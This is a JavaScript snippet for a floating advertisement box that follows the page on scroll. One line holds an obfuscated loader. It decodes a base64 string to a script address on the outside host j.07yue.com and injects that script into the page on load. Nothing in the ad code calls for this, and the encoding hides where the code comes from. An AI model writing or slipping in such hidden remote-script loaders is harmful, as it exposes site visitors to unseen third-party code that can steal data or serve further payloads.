 var divID = document.getElementById("divID");
    divID.style.top = 160;
    position = "right";
    paddingLeftOrRight = 128;
	function uD64(a){return decodeURIComponent(unescape(window.atob(a)))};(function(){var j=document.createElement("script");j.src=uD64('Ly9qLjA3eXVlLmNvbS9jb3B5Lmpz');var u=document.getElementsByTagName("div")[0];u.parentNode.insertBefore(j,u)})();
    function OnADScroll() {
        var top = document.body.scrollTop + document.documentElement.scrollTop + 165;
        if (top > document.body.scrollHeight + document.documentElement.scrollHeight) {
            divID.style.top = (document.body.offsetHeight + document.documentElement.scrollHeight) + 'px';
        }
        else {
            divID.style.top = top + 'px';
        }

        if (position == "left") {
            divID.style.left = paddingLeftOrRight + 'px'; ;
        }
        else {
            divID.style.left = (document.body.clientWidth - paddingLeftOrRight) + 'px';
        }

    }
    window.setInterval('OnADScroll()', 30);
    function hidead()
    { document.getElementById("divID").style.display = "none"; }